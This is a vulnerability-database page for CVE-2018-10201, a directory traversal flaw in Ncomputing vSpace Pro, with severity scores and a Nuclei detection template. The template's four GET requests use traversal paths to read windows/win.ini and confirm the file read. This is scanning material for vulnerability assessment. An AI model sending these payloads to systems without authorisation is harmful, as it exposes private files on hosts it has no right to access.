Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-10201
HistoryNov 24, 2021 - 1:21 p.m.

Ncomputing vSPace Pro 10 and 11 - Directory Traversal

2021-11-2413:21:05
ProjectDiscovery
github.com

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.036 Low

EPSS

Percentile

91.5%

Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.

id: CVE-2018-10201

info:
  name: Ncomputing vSPace Pro 10 and 11 - Directory Traversal
  author: 0x_akoko
  severity: high
  description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to read arbitrary files from the target system.
  remediation: |
    Apply the latest security patches or updates provided by Ncomputing to fix the directory traversal vulnerability.
  reference:
    - https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10201
    - http://www.kwell.net/kwell_blog/?p=5199
    - https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es
    - https://support.ncomputing.com/portal/kb/articles/ncomputing-health-monitor-server-vulnerability-patch
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-10201
    cwe-id: CWE-22
    epss-score: 0.04525
    epss-percentile: 0.91637
    cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: ncomputing
    product: vspace_pro
  tags: cve,cve2018,ncomputing,lfi,packetstorm

http:
  - method: GET
    path:
      - '{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini'
      - '{{BaseURL}}/...\...\...\...\...\...\...\...\...\windows\win.ini'
      - '{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini'
      - '{{BaseURL}}/....\....\....\....\....\....\....\....\....\windows\win.ini'

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 4b0a004830460221008cc9ffc3136acb7533e4d2b6f873e5f4814bfebe687cc77653ef5f49723851bf022100f905b97f3c07686c81b4f1fb0bf84c6ffd2379b58246323892260ede3a60fc98:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.036 Low

EPSS

Percentile

91.5%